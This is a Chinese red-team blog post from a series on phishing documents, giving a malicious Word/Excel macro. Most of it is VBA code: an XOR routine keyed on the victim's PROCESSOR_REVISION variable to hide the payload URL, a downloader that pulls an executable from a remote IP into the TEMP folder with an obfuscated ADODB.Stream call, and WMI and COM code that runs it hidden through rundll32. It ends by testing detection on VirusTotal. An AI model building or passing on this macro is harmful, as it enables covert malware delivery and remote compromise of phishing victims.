钓鱼文档碎碎念(三)
继续我们的钓鱼文档碎碎念系列。
这个思路是在国外一个网站上看到的,原文在这(https://0xdf.gitlab.io/2018/07/31/malware-analysis-muddoc.html),在此感谢作者给出的思路,这里简单来给大家看下总体思路:
大体思路就是使用环境变量去xor解密远程url地址,然后落地化dll,调用rundll32去运行dll,得到sessIon。
我们先来看一下用了xor加密的函数(http://www.vbaexpress.com/kb/getarticle.php?kb_id=951):
Function XorC(ByVal sData As String, ByVal sKey As String) As StringDim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As ByteDim bEncOrDec As Boolean
If Len(sData) = 0 Or Len(sKey) = 0 Then XorC = 'Invalid argument(s) used': Exit Function
If Left$(sData, 3) = 'xxx' ThenbEncOrDec = FalsesData = Mid$(sData, 4)ElsebEncOrDec = TrueEnd If
byIn = sDatabyOut = sDatabyKey = sKeyl = LBound(byKey)For i = LBound(byIn) To UBound(byIn) - 1 Step 2byOut(i) = ((byIn(i) Not bEncOrDec) Xor byKey(l)) - bEncOrDecl = l 2If l > UBound(byKey) Then l = LBound(byKey)Next iXorC = byOutIf bEncOrDec Then XorC = 'xxx' & XorCEnd Function该函数接收两个参数,一个字符串、一个key。而为了安全起见,我们的key不直接写入到宏中,我们这里选择使用环境变量来获取key,机器上的环境变量可以使用set命令来查看:
我们在选择key是,要注意目标环境的变量,每个机器变量可能都不尽相同,不过有一些变量是相同的,我这里选择的是PROCESSOR_REVISION,值为9e0a,那么这里我们就要用到一个样本了,样本已上传到github(https://github.com/lengjibo/RedTeamTools/blob/master/windows/macros/encryptor.xls),该宏可用于加密我们的url地址:
得到一个base64的字符串,然后解密
然后用我们的xor解密函数,key使用Environ来获取,来进行解密:
解密出来的稍微有些问题,这里需要主要环境变量的大小写问题,然后,我们使用下载函数,下载我们的dll,也就是之前的代码:
Dim payload As StringDim namePrefix As StringDim nameSuffix As StringDim zzz As StringDim dollop As ObjectDim dstPath As StringDim savePath As StringnamePrefix = 'AppLaunch-actual'nameSuffix = '.exe'payload = 'http://192.168.41.4/AppLaunch.exe'zzz = payloadDim downloadfSet downloadf = CreateObject('WinHttp.WinHttpRequest.5.1')downloadf.Open 'GET', zzz, Falsedownloadf.setRequestHeader 'Host', '192.168.41.4'downloadf.SendSet dollop = CreateObject(StrReverse('maertS.bdodA'))dollop.Type = 1dollop.Opendollop.Write downloadf.responseBodydstPath = Environ$('TEMP') & '\' & namePrefix & nameSuffixsavePath = dstPathdollop.savetofile savePath, 2
替换里面的指定位置的内容即可,然后调用wmi来运行rundll32来运行我们的dll.
Const HIDDEN_WINDOW = 0strComputer = '.'abc = 'rundll32' & ' ' & dstPath & ',Start'strGetObject = ('winmgmts:\\.\root\cimv2')Set objWMIService = GetObject(strGetObject)Set objStartup = objWMIService.Get('Win32_ProcessStartup')Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(strGetObject & (':Win32_Process'))objProcess.Create abc, Null, objConfig, intProcessID也就是稍微更改之前的代码即可,或者调用com组建进程调用:
Set obj = GetObject('new:C08AFD90-F2A1-11D1-8455-00A0C91F3880')obj.Document.Application.ShellExecute 'calc',Null,'C:\\Windows\\System32',Null,0
然后测试:
vt测试:
点个转发、在看,持续更新........